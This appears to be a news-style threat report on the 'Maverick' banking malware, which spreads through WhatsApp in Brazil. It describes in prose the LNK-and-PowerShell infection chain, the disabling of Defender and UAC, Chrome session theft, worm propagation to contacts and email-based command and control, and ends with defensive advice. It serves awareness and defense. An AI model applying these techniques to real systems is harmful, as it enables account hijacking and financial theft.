A sophisticated banking malware campaign dubbed "Maverick" is spreading rapidly through WhatsApp, targeting Brazil's financial sector and hospitality industry with unprecedented success by exploiting the country's massive user base of 148 million WhatsApp subscribers. The malware, attributed to a threat actor group known as Water Saci, represents a significant evolution in banking trojans by combining browser session hijacking, self-propagating worm capabilities, and advanced evasion techniques designed to bypass enterprise security controls.
Cybersecurity researchers from CyberProof, Sophos, Kaspersky, and Trend Micro have identified striking similarities between Maverick and a previously known banking trojan called Coyote. Both malware strains are written in .NET, exclusively target Brazilian financial institutions and users, and share identical functionality for decrypting banking URLs, monitoring financial applications, and spreading through WhatsApp Web.
The relationship between Maverick and Coyote indicates either direct evolution from previous campaigns or coordinated operations within Brazil's cybercriminal ecosystem. Both malware variants demonstrate identical operational patterns and targeting preferences, suggesting either the same threat actor group or closely affiliated criminal networks sharing code repositories and operational intelligence.
This evolution marks a critical shift in banking trojan development: threat actors have transitioned from traditional phishing and credential harvesting to exploiting legitimate communication platforms and browser session manipulation for stealthier, more scalable attacks that bypass conventional security defenses.
The infection chain begins deceptively with a malicious ZIP archive delivered through WhatsApp messages. The archive contains a Windows shortcut (.LNK) file that, when executed by an unsuspecting user, initiates a sophisticated multi-stage PowerShell-based infection process.
Upon execution, the LNK file launches cmd.exe or PowerShell to connect to an external server (zapgrande[.]com) downloading the first-stage payload. This PowerShell script immediately disables Microsoft Defender Antivirus and User Account Control (UAC), removing critical Windows security barriers before malware installation proceeds.
The malware then downloads a .NET loader featuring advanced anti-analysis capabilities. The loader checks for the presence of reverse engineering tools and terminates itself if debugging environments are detected—a technique designed to thwart security researcher analysis and automated sandboxing systems.
Critically, the loader verifies the victim's geographic location by checking time zone, language, region, and date-time format settings. Maverick will only install on systems configured for Brazilian locales, indicating highly targeted operations focused exclusively on Brazilian territory.
Once installed, Maverick's primary objective is browser session hijacking. The malware downloads ChromeDriver and Selenium for browser automation, then uses VBScript (SORVEPOTEL component) and PowerShell to seize control of WhatsApp Web sessions without triggering security alerts.
The malware copies the victim's legitimate Chrome profile data—including cookies, authentication tokens, and saved browser sessions—to a temporary workspace. This data acquisition allows Maverick to bypass WhatsApp Web's authentication mechanisms entirely, gaining immediate account access without requiring QR code scanning or additional verification.
With hijacked WhatsApp access, the malware automatically distributes malicious ZIP files to all contacts in the victim's address book. The PowerShell component iterates through harvested contacts, personalizes messages using time-based greetings and contact names, then sends the malicious archive to each target. This self-propagating worm mechanism exponentially amplifies infection rates by leveraging social trust relationships.
Maverick monitors active browser tabs for URLs matching a hard-coded list of Brazilian financial institutions. Upon detecting matching URLs, the malware contacts remote command-and-control servers to fetch phishing pages and credential-stealing templates.
The sophisticated C2 infrastructure employs email-based command infrastructure using terra.com[.]br accounts with hardcoded credentials and multi-factor authentication. This unusual approach—replacing traditional HTTP-based C2 communications with IMAP email connections—complicates detection by security monitoring systems typically focused on network anomalies.
Supported C2 commands include comprehensive system surveillance capabilities: INFO collection, CMD execution, PowerShell command execution, screenshot capture, process enumeration, file operations, system configuration changes, and malware self-updating mechanisms.
Initial Maverick targeting focused exclusively on Brazilian financial institutions. However, CyberProof's analysis identified evidence of expansion to hospitality sector targets, suggesting threat actors are refining strategies to steal customer financial and booking data from hotels, airlines, and travel service providers.
This sector expansion indicates either increasing operational ambitions or specific intelligence-gathering objectives targeting high-value hospitality customers and their sensitive financial information.
Trend Micro documented Water Saci's deployment of sophisticated remote management capabilities allowing real-time campaign control. Attackers can pause and resume WhatsApp propagation, monitor infection progress, and dynamically adjust operations across multiple endpoints—effectively converting compromised machines into coordinated botnet infrastructure.
The email-based C2 system, while operationally cumbersome due to MFA requirements, provides significant operational resilience. Traditional HTTP-based C2 infrastructure is easily disrupted through domain takedowns and IP blocking. Email-based communications distribute command infrastructure across legitimate email providers, complicating enforcement and enabling rapid fallback to alternative email accounts.
Brazil's position as the second-largest WhatsApp market globally after India creates unprecedented attack surface. The platform's status as primary communication channel for 148 million users makes it ideal for social engineering and self-propagating malware distribution.
Additionally, Brazilian banking infrastructure represents attractive targets due to the combination of large customer base, substantial account balances, and varying security maturity across institutions and users.
Users should avoid opening ZIP file attachments from unknown WhatsApp contacts, enable two-factor authentication on all banking and critical accounts, maintain current antivirus software, and immediately report suspicious activity to banks and cybercrime authorities. Organizations should implement endpoint detection and response systems, disable dangerous scripting languages where possible, and conduct targeted security awareness training addressing WhatsApp-based threats.
The Maverick campaign demonstrates how cybercriminals systematically exploit communication platform popularity and legitimate browser infrastructure to conduct large-scale, self-propagating financial fraud campaigns.